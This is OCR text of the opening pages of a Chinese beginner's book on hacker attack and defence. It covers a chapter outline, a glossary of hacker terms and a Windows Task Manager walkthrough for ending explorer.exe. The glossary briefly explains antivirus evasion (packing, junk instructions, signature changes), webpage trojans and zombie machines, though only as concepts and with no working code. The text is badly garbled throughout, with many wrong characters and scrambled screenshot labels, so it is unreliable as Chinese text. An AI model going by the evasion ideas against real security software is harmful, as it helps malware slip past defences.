






天 河 文化 





编著 








The Ne Vest Hacker Attack and Defense: 
fromi Novice to Master 





内 容 全 面 ， 与 时 俱 进 : 
介绍 手机 黑客 攻防 、 木 马 攻防 等 
轻松 入 门 。 
”任务 驱动 ， 自 主 学 习 : 
“理论 + 实战 + 图 文 + 视频 ”的 学 习 模式 ， 让 读者 快速 精通 黑客 攻防 技术 。 
实例 为 主 ， 易 于 上 手 : 
ea toe 





对 容 ， 帮 助 读者 快速 打通 学 习 的 重要 关卡 ， 
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本 书 主要 特色 : 

本 书 以 图 文 并 成、 按 图 
索 戏 的 方式 揭露 黑客 的 攻击 于 
法 ， 并 详细 讲解 相应 的 网 络 安 
全 管理 防御 技术 详细 分 析 每 
一 个 操作 案例 力求 让 读者 尺 
快 掌握 黑客 技术 ， 理 解 和 掌握 
类 似 场 合 的 应 对 思路 


本 书 读者 对 象 : 


计算 机 初学 者 


需要 保障 数据 安全 的 日 单 办 公 


.网 吧 工 作 人 员 


喜欢 钻研 黑客 攻防 扩 术 但 编程 
基础 薄弱 的 读者 


相关 计算 机 培训 机 构 的 师 生 
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本 书 共 19 草 ， 结 合 案例 ， 由 浅 入 深 、 系 统 全 面 地 介绍 了 黑客 攻防 技 
术 ， 内 容 涵盖 : 从 零 开 始 认识 墨 客 、 信 息 的 扫描 与 嗅 探 、 系 统 漏 洞 攻 防 、 
病毒 攻防 、 木 马 攻防 、 手 机 墨客 攻防 、 网 洲 与 网 吧 攻 防 、 密 码 攻防 、 黑 客 
入 侵 检 测 技术 、 网 络 代 理 与 追踪 技术 、 后 门 技术 、 和 侵 凑 迹 清 除 技 术 、 远 
程控 制 技 术 、 局 域 网 攻防 、QQ 账号 攻防 、 网 站 攻防 、 系 统 和 数据 的 备份 与 
恢复 、 保 障 网 络 支 付 工具 的 安全 、 间 诬 软 件 的 清除 和 系统 清理 。 

本 书 内容 丰 晤 全面、 图 文 并 成 、 从 吻 到 难 ， 面 器 广大 计算 机 初学 者 和 
涉 客 攻防 技术 爱好 者 ， 也 适用 于 逢 要 保障 数据 安全 的 日 弟 办 公 人 员 、 网 络 
安全 从 业 人 员 及 网 络 管理 人 员 参 考 阅 读 。 
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随 看 互联 网 的 普及 ， 人 们 越发 地 依赖 利用 互联 网 进行 购物 和 投资 等 ， 互 联网 的 发 展 同 
时 方便 了 墨客 工具 的 传播 , 有 的 墨客 会 对 一 些 臣 于 防范 的 计算 机 做 出 攻击 ,进行 识别 偷 狠 、 
贸 取 信用 卡 账 亏 、 勒 索 银 行 等 行为 。 因 此 ， 提 高 防范 意识 ， 学 习 黑 客 的 入 侵 手 段 以 及 防御 
黑客 的 技术 和 方法 极为 重要 。 


本 书 内 容 


本 书 紧 紧 围 绕 “ 攻 ”和 “ 防 ” 两 个 不 同 的 角度 ， 先 揭 器 黑客 攻击 手段 ， 青 介绍 相应 的 
防 耀 方法。 知己知彼， 方 能 更 好 地 防御 黑客 攻击 。 

本 书 内 容 共 19 革 。 

第 1 章 : 从 零 开 始 认识 黑客 。 主 要 介绍 黑客 基础 知识 ， 包 括 黑 客 常 用 术语 、 进 程 、 并 
口 、 营 见 的 网 络 协议 、 黑 客 音 用 命令 以 及 在 计算 机 中 创建 虚拟 测试 环境 每 内 容 。 

第 2 章 : 信息 的 扫描 与 吊 探 。 主 要 介绍 扫描 、 虽 探 的 实施 与 防范 以 及 网 络 监 探 等 内 容 。 

第 3 草 : 系统 漏洞 攻防 。 主 要 介绍 系统 漏洞 基础 知识 、Windows 服务 器 系统 入 侵 上 曝光 、 
DcomRpc 漏洞 入 侵 曝 光 以 及 用 MBSA 检测 系统 漏洞 等 内 容 。 

第 4 章 : 病毒 攻防 。 主 要 介绍 病毒 基础 知识 、 两 种 和 俐 单 病毒 的 生成 与 防范 、 脚 本 病毒 
的 生成 与 防范 、 安 病毒 与 邮件 病毒 的 防范 、 网 络 蠕虫 的 防范 以 及 杀毒 软件 的 使 用 等 内 容 。 

第 $ 草 : 木马 攻防 。 主 要 介绍 木马 基础 知识 、 木 瑟 的 伪装 与 生成 、 木 瑟 的 加 腕 与 脱 元 
以 及 木马 清除 软件 的 使 用 等 内 容 。 

第 6 章 : 手机 黑客 攻防 。 主 要 介绍 智能 手机 操作 系统 、 获取 Android Root 权限 、Android 
手机 备份 功能 、 安 时 系统 刷 机 、 平 采 手 机 越狱 、 手 机 复 牙 攻击 曝光 、 手 机 拒绝 服务 攻击 嗓 
光 、 手 机 电子 邮件 攻击 曝光 、 手 机 病毒 与 木马 攻防 、 手 机 加 密 技 术 、 手 机 文 付 安全 防范 、 
手机 优化 及 安全 性 能 的 提升 等 内 容 。 







































































第 7 章 ; 网 洲 与 网 吧 攻 防 。 主 要 介绍 网 洲 盗号 木马 、 网 站 充值 欺 硫 本 、 防 范 洲 戏 账号 
人 破解、 警惕 局 域 网 监听 及 疾 浏 网管 大 师 等 内 容 。 
第 8 章 : 密码 攻防 。 主 要 介绍 加 密 与 解密 基础 知识 、 七 种 第 见 的 加 密 解 密 类 型 、 文 件 











和 文件 夹 冤 但 攻防 、 系 统 密 但 攻防 及 其 他 加 客 解 密 工 具 等 内 容 。 

第 9 草 : 黑客 入 侵 检 测 技术 。 主 要 介绍 基于 网 络 的 入 侵 检 测 系 统 、 基 于 主机 的 入 侵 检 
测 系 统 、 基 于 漏洞 的 入 侵 检 测 系 统 、 院 客 噶 入 侵 检 测 系统 、Snort 入 侵 检 测 系统 等 内 容 。 

第 10 草 : 网 络 代 理 与 妃 躁 技术。 主要 介绍 网 络 代 理工 具 “ 代 理 猎 手 ” 和 SocksCap32、 
销 见 的 黑客 妃 踩 工具 NeroTrace Pro 等 内 容 。 

第 11 章 : 后 门 技术 。 主 要 介绍 后 门 的 分 类 、 账 号 后 门 技术 曝光 、 系 统 服务 后 门 技术 曝 
光 、 检 测 系 统 中 的 后 门 程序 等 内 容 。 

第 12 革 : 入 侵 浪 迹 清 除 技术 。 主 要 介绍 黑客 留 下 的 脚印 、 清 除 服 务 器 日 志 、Windows 

志清 理工 具 、 清 除 历史 痕迹 等 内 容 。 

第 13 章 : 远程 控制 搁 术 。 主 要 介绍 认识 远程 控制 、 远 程 加 而 连接 与 协助 、 用 WinShell 
实现 远程 控制 、 用 QuickIP 进行 多 点 控制 等 内 容 。 

第 14 章 : 局 域 网 攻防 。 主 要 介绍 局 域 网 安全 、 局 域 网 攻击 上 曝光、 局 域 网 监控 工具 等 
内 容 。 

第 15 革 : QQ 账号 攻防 。 主要 介绍 三 种 盗 取 QQ 吕 但 软件 防范 、 用 密码 监听 右 揪 出 “内 
鬼 ” 保护 QQ 密码 和 聊天 记录 每 内 容 。 

第 16 章 : 网 站 攻防 。 主 要 介绍 SQL 注入 攻击 降 光 、ZBSI 检测 注入 点 上 明光、Cookie 注 
入 攻击 上 曝光、 器 站 脚本 攻击 曝光 每 内 容 。 

第 17 革 : 系统 和 数据 的 备份 与 恢复 。 主 要 介绍 备份 与 还 原 操作 系统 、 备 份 与 还 原 用 成 
数据 、 使 用 恢复 工具 来 恢复 误 删 除 的 数据 等 内 容 。 

第 18 草 : 保障 网 络 文 付 工 具 的 安全 。 主要 介绍 加 强 文 付 宝 的 安全 防护 和 加 强 财 付 通 的 
安全 防护 等 内 容 。 

第 19 草 : 间谍 软件 的 清除 和 系统 清理 。 主 要 介绍 流氓 软件 的 消除、 间谍 软件 防护 实战 
和 第 见 的 网 络 安全 防护 工具 等 内 容 。 


本 书 特色 


本 书 循序 渐进 地 讲解 了 墨客 攻防 的 具体 方法 和 技巧 ， 通 过 完成 一 个 个 实践 任务 ， 读 者 
可 以 轻松 掌握 各 种 知识 点 ， 在 不 知 不 觉 中 快速 提升 实战 技能 。 

@ 任务 驱动 ， 目 主 学 习 ,“ 理 论 + 实 战 + 图 文 ”学 习 柑 式 让 读者 快速 入 门 。 

@ 内 容 全 面 ， 轻 松 入 门 ， 快 速 打通 初学 者 学 习 的 重要 关卡 。 

@ 实例 为 主 ， 易 于 上 手 ， 模 拟 真实 工作 环境 ， 解 决 各 种 疑难 问题 。 

本 书 以 狗 文 并 成 、 投 网 索 世 的 方式 揭露 黑客 的 攻击 手法 ， 并 详细 讲解 相应 的 网 络 安全 
常理 防 御 技术 ， 详 细 分 析 每 一 个 操作 案例 ， 力 求 让 读者 尽快 掌握 韶 客 编程 技术 ， 理 解 和 和 党 
握 类 似 场合 的 应 对 思路 。 
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本 书 适 合 人 和 群 


本 书 适合 以 下 读者 学 习 使 用 : 

@ 计算 机 初学 者 ; 

@ 需要 保障 数据 安全 的 日 党 办 公 人 员 ; 

@ 网络 管理 人 员 、 了 网吧 工 作 人 员 ， 

@ 喜欢 钻研 黑客 攻防 技术 但 编程 基础 溥 弱 的 谈 者 ; 
@ 相关 计算 机 培训 机 构 的 师 生 。 


本 书 作者 


本 书 由 大 河 文 化 编著 ， 参 与 本 书 编写 的 人 员 有 允 奎 国 、 王 叶 、 候 务 人 其 、 统 朝 恰 、 施 亚 、 
吕 展 伟 、 朱 伟 伟 、 全 季 、 郊 林 、 张 阮 阮 、 丁 建 尺 、 方 开 庆 、 陈 红 、 陈 伟 、 赵 雨 、 王 越 、 赵 
根 昌 、 竹 简 、 盏 玉 珍 和 余 和 东航 。 

最 后 ， 需 要 提醒 大 家 的 是 : 根据 国家 有 关 法 律 规定 ， 任 何 利 用 墨客 技术 攻击 他 人 计算 
机 及 相关 设备 的 行为 都 属于 违法 行为 ， 和 希望 恋 者 在 阅读 本 书后 不 要 使 用 本 书 中 介绍 的 黑客 
技术 侵害 别人 权 奉 ， 耕 则 后 果 目 负 。 
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从 零 开 始 认 识 黑客 


要 学 习 黑 客 知 识 ， 就 得 了 解 进 程 、 端 口 、 卫 地 址 以 及 黑客 常见 的 术语 和 命 
令 。 由 于 初学 者 对 这 方面 知识 了 解 不 多 ， 本 章 专 门 针 对 上 述 内 容 进行 讲解 ， 从 
而 帮助 读者 为 后 面 的 学 习 打 好 基础 。 


〇 黑 容 常 用 术语 

O 〇 进程 和 端口 
常见 的 网 络 协议 

〇 黑客 常用 命令 

〇 创建 虚拟 测试 环境 





> 
攻防 从 入 门 到 精通 





1.1 认识 黑 容 


1 黑 和 名、 红 宪 、 监 客 及 驴 客 


墨客 ， 最 早 源 目 英文 hacker， 指 的 是 水 平 高 超 的 计算 机 专家 ， 尤 其 是 程序 设计 人 员 ， 
算是 一 个 统称 。 

红 客 ， 是 指 维护 国家 利益 、 代 表 中 国人 民意 忘 的 红 客 ， 他 们 热爱 目 己 的 祖国 和 民族 ， 
热爱 和 平 ， 极 力 地 维护 国家 的 安全 与 尊严 。 

监 客 是 指 信仰 目 由 、 提 倡 爱国 主义 的 墨客 们 ， 他 们 用 目 己 的 力量 来 维护 网 络 的 和 和 平 。 

骇 客 ， 是 Cracker 的 音 诺 ， 婚 是 “破解 者 ”的 意思 ， 有 是 指 从事 亚 意 破 解 商 业 软件 、 亚 
意 入 侵 别人 的 网 站 等 的 一 些 计算 机 高 手 。 


























1.14.2 昌 帽 黑 各 、 灰 由 黑 各 及 黑 由 黑客 


因特网 在 全 球 的 迅猛 及 展 为 人 类 提供 了 方便 、 目 由 和 无 限 的 财富 ， 政 治 、 秆 事 、 经 济 、 
科技 、 教 育 、 文 化 等 各 个 方面 都 越 来 越 网 络 化 ， 并 且 逐 渐 成 为 人 们 生活 、 娱 乐 的 一 部 分 。 
可 以 说 ,信息 时 代 已 经 到 来 ,信息 已 成 为 物质 和 能 量 以 外 维持 人 类 社会 的 第 三 类 资源 ， 它 
已 成 为 未 来 生活 中 的 重要 介质 。 随 看 计算 机 的 普及 和 因特网 技术 的 迅速 及 展 ， 黑 客 也 随 之 


























出 现 了 。 
黑客 的 基本 涵义 是 指 一 个 拥有 熟练 计算 机 技术 的 人 ， 人 们 现在 更 多 地 将 “ 澡 客 ”用 于 
指 计算 机 侵入 者 。 











白 帽 黑客 是 指 有 能 力 破坏 计算 机 安全 但 不 具 恶 意 目的 的 黑客 。 白 帽 黑客 一 般 遵守 道德 
规范 并 常常 同 企业 合作 去 改善 被 发 现 的 安全 弱点 。 

灰 帽 黑客 是 指 对 于 伦理 和 法 律 暖 味 不 清 的 黑客 。 

黑 帆 黑客 经 常用 于 区 别 于 一 般 《正面 的 ) 理性 的 黑客 。 这 个 词 自 1983 年 开始 流行 ， 大 
概 是 由 于 采用 了 相似 发 音 和 对 safe cracker 的 解释 ， 最 终 成 为 一 个 “犯罪 ”和 “黑客 ”的 混 


人 1 五 
品 [9 O 


























1.14.3 成 为 黑客 必须 掌握 的 知识 


想 要 成 为 黑客 ， 并 不 是 一 件 简单 的 事情 ， 墨 客 不 仅 要 歼 练 营 握 一 定 程度 的 碳 文 、 理 解 
明 用 的 黑客 术语 和 网 络 安全 术语 、 熟 练 使 用 常用 DOS 命令 和 黑客 工具 ,还 要 党 握 主流 的 纺 
程 语言 以 及 脚本 。 

1. 熟练 掌握 一 定 的 美文 

学 习 英 文 对 于 黑客 来 说 非 第 重要 ， 因 为 现在 很 多 资料 和 教程 部 是 瑞 文 版 本 。 一 个 源 洞 
从 有 友 现 到 出 现 中 文 介绍 ， 大 约 需要 一 个 星期 的 时 间 ， 在 这 段 时 间 内 ， 网 络 过 理 员 惑 已 丝 有 
足够 的 时 间 修 补漏 筒 了 ， 所 以 当 普 通用 户 看 到 中 文 介 绍 的 时 候 ， 这 个 漏洞 可 能 嘻 吏 已 经 修 
补 好 了 。 因 此 开始 学 习 黑 客 驶 要 尽量 阅读 英文 资料 、 使 用 英文 软件 ， 并 且 及 时 关注 国外 者 


四 















































< 第 1 章 
从 零 开 始 认 识 黑 客 


名 的 网 络 安 全 网 站 。 

2. 理解 常用 的 黑客 术语 和 网 络 安全 术语 

在 常见 的 黑客 论坛 中 ， 经 常会 看 到 “肉鸡 ”“ 后 门 ” 和 “人 免 杀 ”每 词语 ， 这 些 词语 可 以 
统称 为 黑客 术语 ， 如 果 不 理解 这 些 词语 , 在 与 其 他 黑客 交流 技术 或 经 验 时 束 会 显得 很 吃力 。 
除了 要 掌握 相关 的 黑客 术语 之 外 ， 还 需要 和 擎 握 TCP/AP 协议 、ARP 协议 等 网 络 安全 技术 。 

3. 熟练 使 用 常用 DOS 命令 和 黑客 工具 

第 用 DOS 命令 是 指 在 DOS 环境 下 使 用 的 一 些 命令 ， 主 要 包括 Ping、netstat 以 及 net 命令 
等 。 利 用 这 些 命 令 可 以 实现 不 同 的 功能 ， 例 如 使 用 Ping 命令 可 以 获取 目标 计算 机 的 人 P 地 址 以 
及 主机 名 。 而 黑客 工具 则 是 指 黑 客 用 来 远程 入 侵 或 者 咎 看 是 否 存在 漏洞 的 工具 ， 例 如 使 用 
X-Scan 可 以 得 看 目标 计算 机 是 售 存在 漏洞 ,利用 EXE 捆绑 器 可 以 制作 市 木 蕊 的 其 他 应 用 程序 。 

4. 掌握 主流 的 编程 语言 以 及 脚本 语言 

程序 语言 可 分 为 以 下 5 类 。 

(1) 网 页 脚本 语言 (Web Page Script Languages ) 

网 页 脚本 语言 就 是 网 页 代码 ， 比 如 Html、Javascript、CSS、ASP、PHP、Xml 等 。 

(2) 解释 型 语言 (Interpreted Languages ) 

解释 型 语言 包括 Perl、Python、REBOL、Ruby 等 ， 也 律 被 称 作 Script 语言 ， 通 党 被 用 
于 和 压 层 的 操作 系统 沟通 。 这 类 语言 的 缺点 是 效率 莽 、 源 代 公 外 露 一 一 所 以 不 适合 用 来 开 
发 软件 产品 ， 一 般 用 于 网 由 服务 桥 。 

(3) 混合 型 语言 (Hybrid Languages ) 

混合 型 语言 的 代表 是 JAVA 和 C#， 它 介 于 解释 型 语言 和 编译 型 语言 之 间 。 

(4) 编译 型 语言 (Compiling Languages ) 

C/C++ 和 Java 都 是 编译 型 语言 。 

(5) 汇编 语言 (Assembly Languages ) 

汇编 语言 是 最 接近 于 便 件 的 语言 ， 不 过 现在 用 的 人 很 少 。 


程序 语言 字 习 顺序 建议 






























































如 果 完 全 没有 程序 经 验 ， 可 照 这 个 顺序 来 学 习 : JavaScript 一 一 解释 型 语言 
混合 型 语言 一 一 编译 型 语言 一 一 汇编 。 





1.1;:4 黑客 吊 用 术语 


1. 肉鸡 

“肉鸡 ”比喻 那些 可 以 随意 被 黑客 控制 的 计算 机 ， 黑客 可 以 像 操 作 目 己 的 计算 机 那样 来 
操作 它们 ， 而 不 被 对 方 所 发 觉 。 

2. 木马 

木马 指 表面 上 伪装 成 正常 的 程序 ， 但 是 当 这 些 被 程序 运行 时 ， 束 会 获取 系统 的 整个 探 
制 权 限 。 有 很 多 黑客 就 是 热衷 于 使 用 木马 程序 来 控制 别人 的 计算 机 ， 比 如 灰 鸟 子 、 黑 洞 、 
PcShare 等 。 

3. 网 页 木马 

网 页 木马 指 表面 上 伪装 成 普通 的 网 页 文件 或 是 将 恶意 的 代码 直接 插入 到 正名 的 网 页 文 
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Ra 
er 一 一 泊 安 ' 攻防 从 入 门 到 精通 


件 中 ， 当 有 人 访问 时 ， 网 页 木马 束 会 利用 对 方 系统 或 者 浏览 器 的 漏洞 日 动 将 配置 好 木马 的 
服务 端 下 载 到 访问 者 的 计算 机 上 来 日 动 执行 

4. 挂 马 

挂 马 指 在 他 人 的 网 站 文件 中 放 入 网 页 本 马 或 者 是 将 代码 潜入 到 对 方正 党 的 网 页 文件 
里 ， 以 使 浏览 者 中 马 。 

S$S. 后 门 

这 是 一 个 形象 的 比喻 ， 熙 客 在 利用 某 些 方法 成 功 地 控制 了 目标 主机 后 ， 可 以 在 对 方 的 
系统 中 植 入 特定 的 程序 ， 或 者 修改 某 些 设置 。 这 些 改动 表面 上 看 是 很 难 被 察 沉 的 ， 但 是 黑 
客 却 可 以 使 用 相应 的 程序 或 者 方法 来 轻易 地 与 这 台 计 算 机 建立 连接 , 重新 控制 这 合计 算 机 ， 
束 好 像 是 黑客 偷偷 地 配 了 一 把 主人 房 加 的 钥 是 ， 可 以 随时 进出 而 不 被 主人 发 现 一 样 。 通 和 沼 ， 
大 多 数 的 特洛伊 木马 程序 都 可 以 被 入 侵 者 用 于 制作 后 门 。 

6. IPCS 

IPC$ 用 于 是 共 吝 “命名 管道 ”的 资源 ， 它 是 为 了 让 进程 间 通 信 而 开放 的 命名 管道 ， 可 
以 通过 验证 用 户 名 和 蜜 人 码 获 得 相应 的 权限 ， 在 远程 管理 计算 机 和 和 三 看 计算 机 的 共享 资源 时 




































































使 用 。 
7. 弱 口 令 
弱 口 令 指 那些 强度 不 够 、 容 易 被 猜 解 的 ， 类 似 于 123、abc 这 样 的 口令 “〈 密 但 )。 
8. Shell 


Shell 指 的 是 一 种 命令 执行 环境 ， 比 如 ， 当 用 户 按 下 键盘 上 的 《Wint+R〉 组合 键 时 出 现 
“运行 ”对 话 框 ， 输 入 “cmd” 并 按 ‘Enter〉 键 后 会 出 现 一 个 用 于 执行 命令 的 黑色 窗口 ， 这 
束 是 Windows 操作 系统 的 Shell 执行 环境 。 
9. WebShell 
WebShell 束 是 以 .asp、.php、.jsp 或 者 .cgi 等 网 页 文件 形式 存在 的 一 种 命令 执行 环境 ， 
也 可 以 将 其 称 作 是 一 种 网 页 后 门 。 
10. 溢出 
确切 地 讲 ， 洲 出 应 该 是 “ 绥 冲 区 洲 出 ”人 简单 的 解释 就 是 程序 对 接收 的 输入 数据 没有 执 
行 有 效 的 检测 而 导致 错误 ， 后 果 可 能 是 造成 程序 朋 肖 或 者 是 执行 攻击 者 的 命令 。 洲 出 大 致 
CN 堆 洲 出 和 栈 洲 出 。 
， 注 入 
人 的 水 平 参差 不 齐 ， 衣 当 六 一 部 分 应 用 程序 存在 安全 隐 隐患 ， 用 户 可 以 提交 一 
ee 根据 程序 返回 的 结果 获得 某 些 想 要 的 数据 ， 这 就 是 SQL 注入 。 
.注入 后 
SR 可 以 实行 注入 的 地 方 ， 通 第 是 一 个 访问 数据 库 的 连接 。 根 据 注入 点 数据 库 运 
行 账号 的 权限 的 不 同 ， 所 得 到 的 权限 也 不 同 。 
13. 内 网 
通俗 地 讲 ， 内 网 就 是 局 域 网 ， 比 如 网 吧 、 校 园 网 、 公 司 内 部 网 等 都 属于 此 类 。 如 果 计 
算 机 的 IP 地 址 在 以 下 三 个 郊 围 之 内 ， 束 说 明 设 计算 机 是 处 于 内 网 之 中 的 : 10.0.0.0 一 
10.255.255.255、172.16.0.0~172.31.255.255 和 192.168.0.0~192.168.255.255。 
14. 外 网 
外 网 是 相对 于 内 网 而 言 的 ， 其 中 的 计算 机 直接 连 入 互联 网 ， 从 而 与 互联 网 上 的 任意 一 
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从 妻 开始 认识 黑客 


台 计 算 机 互相 访问 。 

15. 免 杀 

倪 杀 是 指 通过 加 壳 、 加 密 、 修 改 特征 码 、 加 花 指 令 等 技术 来 修改 程序 ， 使 其 逃 过 杀毒 软 
件 的 查 杀 。 

16. 加 壳 


加 学 是 指 利 用 特殊 的 算法 ， 将 EXE 可 执行 程序 或 者 DLL 动态 链接 库 文件 的 编码 进行 
改变 《比如 实现 压缩 、 加 客 )， 以 达到 缩小 文件 体积 或 者 加 密 程 序 编 权 ， 甚 全 是 因 过 杀毒 软 
件 查 杀 的 上 日 的 。 目 前 较 常 用 的 这 有 UPX、ASPack、PePack、PECompact、UPack 等 。 

17. 花 指令 

传 指令 是 指 儿 名 汇编 指令 ， 让 汇编 语句 进行 一 些 跳 苇 ， 使 得 杀毒 软件 不 能 正音 地 判断 
病毒 文件 的 构造 。 通 俗 地 说 ， 就 是 杀毒 软件 是 从 头 到 脚 按 顺序 来 租 找 病毒 的 ， 如 末 把 病毒 
的 头 和 脚 其 倒 位 置 ， 杀 毒 软 件 束 找 不 到 病毒 了 。 

















1.2 ”认识 进程 与 端口 


1.2.1 认识 系统 进程 


进程 是 程序 在 计算 机 上 的 一 次 执行 活动 。 当 运行 一 个 程序 时 ， 束 启动 了 一 个 进程 。 显 
然 ， 程 序 是 静态 的 ， 进 程 是 动态 的 。 进 程 可 以 分 为 系统 进程 和 用 户 进 程 两 种 。 凡 是 用 于 完 
成 操作 系统 的 各 种 功能 的 进程 束 是 系统 进程 ， 它 们 束 是 处 于 运行 状态 下 的 操作 系统 本 号 ; 
用 户 进 程 束 是 所 有 由 用 户 局 动 的 进程 。 进 程 是 操作 系统 进行 资源 分 配 的 日 位 。 

在 Windows 操作 系统 中 按 (Ctrlt+ShifttEsc〉 组 合 键 ， 即 可 打开 “Windows 任务 省 理 器 ” 
窗口 。 切 换 到 “进程 ”选项 卡 ， 即 可 看 到 本 机 中 开启 的 所 有 进程 ， 用 户 名 SYSTEM 所 对 应 
的 进程 便 是 系统 进程 。 这 些 进 程 的 名 称 及 含义 如 表 1-1 所 示 。 如 果 想 设置 进程 显示 的 内 容 ， 
则 选择 “查看 ”>“ 选 择 列 ” 闲 单 命令 ， 在 “选择 进程 页 列 ” 对 话 框 中 勾 选 相应 的 复 选 框 。 


选择 进程 页 列 
请 选择 将 显示 在 “任务 管理 器 ”的 进程 内 上 的 列 。 





























m 国 Windows 任务 管理 厂 
文件 (了 “选项 (O) ”但 看 (W 帮助 (H) 





站 让 

用 户 名 n 
会 话 了 

CPU 使 用 率 

同 crv 时 间 

回 内 存 - 工作 集 

回 内 存 - 高 峰 工 作 集 


i taskhost. exe 2128 .Admin. ,003d EK Win 
dwm. exe 2240 in... 18, 352 KK 


explorer.exe 2288 Nn... 57, B04 KEK 
ctfmon. exe 2312 1 





3B0tray. exe 2884 1n... 15, 424 下 
BaidusdTra... 3084 in... 10, 032 KEK 
BaiduhnTra... 3248 in... 13, 908 K 
eo0dF1ichp. exe 3552 
3BOWanePan... 3718 


回 内 存 - 工作 集 增 量 
内 存 - 专用 工作 集 
回 内 存 - 提交 大 小 

中 内 存 - 页 面 组 :中 池 
中 内 存 - 非 页 面 缕 冲 池 
站 页 面 错误 

站 | 页 面 错误 增 量 

乒 | 基本 休 先 级 
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团 显 示 所 有 用 户 的 进程 G@) 


CPU 使 用 率 : 11% 办 理 内 存 : 6596 








查看 本 机 中 开启 的 进程 


和 





宏 
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表 1-1 系统 进程 的 名 称 和 基本 含义 


名 称 
conime.exe 
CSTSS.eXe 


ctfmon.exe 


该 进程 与 输入 法 编辑 费 相 关 ， 能 
该 进程 是 微软 客户 端 /服务 端 运行 时 子 系统 。 该 进程 管 


基本 含义 


E 够 确保 正常 调整 和 编辑 系统 中 的 输入 法 


理 Windows A El a 





该 进程 与 输入 法 有 关 ， 该 进程 的 正常 运行 能 够 确保 语言 栏 能 


显示 在 任务 栏 中 








该 进程 是 Windows 资源 管理 器 ， 可 以 说 是 Windows 和 该 进程 的 正常 运行 能 





explorer.exe 


lsass.exe 





Services.exe 


SMSS.CeXC 


SVchost.eXe 


系统 也 会 重新 局 动 该 进程 

system 

该 进程 的 功能 是 在 CPU 
低 CPU 内 核 的 温度 


system idle process 


够 确保 桌面 显示 桌面 图 标 和 任务 栏 
该 进程 用 于 Windows 操作 系统 的 安全 机 制 、 本 地 安全 和 登录 策略 
该 进程 用 于 启动 和 停止 系统 中 的 服务 ， 如 果 用 户 手动 终止 该 进程 ， 系 统 也 会 重新 启动 该 进程 
该 进程 用 于 调用 对 话 管 理子 系统 和 人 负责 用 户 与 操作 系统 的 对 话 
该 进程 是 从 动态 链接 库 (DLL) 中 运行 的 服务 的 通用 主机 进程 名 称 


， 如 条 用 户 手动 终止 该 进程 ， 


该 进程 是 Windows 页 面 内 存 管理 进程 ， 它 能 够 确保 系统 的 正常 局 动 
空闲 时 发 出 的 一 个 命令 ， 使 CPU 挂 起 〈 和 暂时 停止 工作 )， 从 而 有 效 降 








winlogon.exe 


1.2:2 天 闭 和 新 建 系 统 进程 


在 Windows 7 操作 系 经 
进程 就 可 以 手动 关闭 和 新建 。 


STEP01: 选择 “启动 任务 管理 器 ”命令 


工具 栏 (1) 


层 苔 窗口 (D) 
堆 营 宇 示 窗口 (T) 


并 排 旺 示 窗 口 D 
显示 豪 面 ($) 


右 击 任务 栏 中 


9 空白 处 。 管理 器 ”命令 。 
STEP03: 确认 结束 该 进 


| i 要 Windows 任务 管理 器 
文件 (日 ”选项 (0) 前 看 (V) 帮助 (H) 








到 | 是 否 要 结束 “explorer.exe” ? 


| | 如 果 打 开 的 程序 与 此 进程 相关 联 , 则 打开 的 程序 将 关闭 , 将 寺 
和 失 所 有 未 保存 的 数据 。 如 果 结 训 系 统 进程 ， 则 可 能 导致 系统 不 
稳定 。 是 否 确定 要 此 和 纤 ? 





弹出 对 话 框 ， 单 击 “ 结 束 进 程 ” 按 钮 ， 确 认 结束 
该 进程 。 








该 程序 是 Windows NT 用 户 登 录 程 序 ， 主 要 用 于 管理 用 户 登 录 和 退出 


中 ， 用 户 可 以 手动 天 财 和 新 建部 分 系统 进程 ， 例 如 explorer.exe 


STEPO2: 


| i 可 | Windows 任务 管理 器 
文件 (Fi 选项 (DO) 章 春 (V) 帮助 ({H) 


用 户 名 CPU “内存 
SYSTENM 
explorer. exe STSTEM 


mw are-hos ll 
are Sm oo 


回 显 示 所 有 用 户 的 进 和 


结束 explorer.exe 进程 


映像 名 称 


Searchlndexer. exe 





进程 数 : 45 CPU 情 用 率 : 036 物理 内 存 : 36% 


选中 explorer.exe 单 击 “结束 进 
进程 。 程 ” 按 钮 。 


STEP04: 查看 桌面 显示 信息 





此 时 可 看 见 桌 面 上 只 
和 任务 栏 消失 了 。 


显示 了 桌面 背景 ， 桌面 图 标 


EC 





7] Windows 将 根据 您 所 输入 的 名 称 ,为 您 打开 相应 的 程序 、 
|。 文件 夫 、 文 档 或 Internet 资源 


打开 (O): 





在 “Windows 任 务 管理 器 ”窗口 中 选择 “文件 ” 在 文本 框 中 输入 explorer 单 击 “ 确 定 ” 
> “新建 任务 ( 运行 ) 菜单 命令 。 .exe "。 按钮 。 


STEP07: 查看 创建 进程 后 的 桌面 


桌面 上 重新 显示 了 桌面 图 标 和 任务 栏 ， 即 
系统 已 成 功 运行 explorer.exe 进 程 。 


Ia 站 CE 





12.3 ”亲口 的 分 类 





端口 (Port) 可 以 认为 是 计算 机 与 外 界 通 信人 交流 的 出 口 。 其 中 ， 便 件 领域 的 端口 又 称 
接口 ， 如 USB 问 口 、 串 行 端口 等 ， 软 件 领 域 的 端口 一 般 指 网 络 中 面 癌 连接 服务 和 无 连接 
服务 的 通信 协议 端口 ,是 一 种 抽象 的 软件 结构 , 包括 一 些 数 据 结 构 和 IO (基本 输入 输出 ) 
绥 剖 区。 

闪 口 是 传输 层 的 内 容 ， 是 面 问 连 接 的 ， 它 们 对 应 看 网 络 上 第 见 的 一 些 服 务 。 这 些 香 见 
的 服务 可 划分 为 使 用 TCP 端口 〈 面 癌 连 接 ， 如 打 电 话 ) 和 使 用 UDP 端口 〈 无 连接 ， 如 与 
信 ) 两 种 。 

在 网 络 中 可 以 被 命名 和 寻 址 的 通信 端口 是 一 种 可 分 配 资源 ， 由 网 络 OSI (Open System 
Interconnection， 开 放 系 统 互联 ) 协议 可 知 ， 传 输 层 与 网 络 层 的 区 别 是 传输 层 提供 进程 通信 
能 力 ， 网 络 通信 的 最 终 地 址 不 仅 包 括 主 机 地 址 ， 还 包括 可 摘 述 进程 的 某 种 标识 。 因 此 ， 当 
应 用 程序 〈 调 入 内 存 运 行 后 一 般 称 为 进程 ) 通过 系统 调用 与 某 端 口 建立 连接 (Binding， 缆 
定 ) 之 后 ， 传 输 层 传 给 该 端口 的 数据 都 裤 相 应 进程 所 接收 ， 相 应 进程 发 给 传输 层 的 数据 都 
从 该 疹 口 输出 。 

在 网 络 技术 中 ， 端 口 大 致 有 两 种 意思 : 一 是 物理 意义 上 的 了 商品， 如 集 线 占 、 人 交换 








~ 7 站 汪 和 


取 FRR > 
杀 打 攻防 从 入 门 到 精通 
小 全 人 人 他 


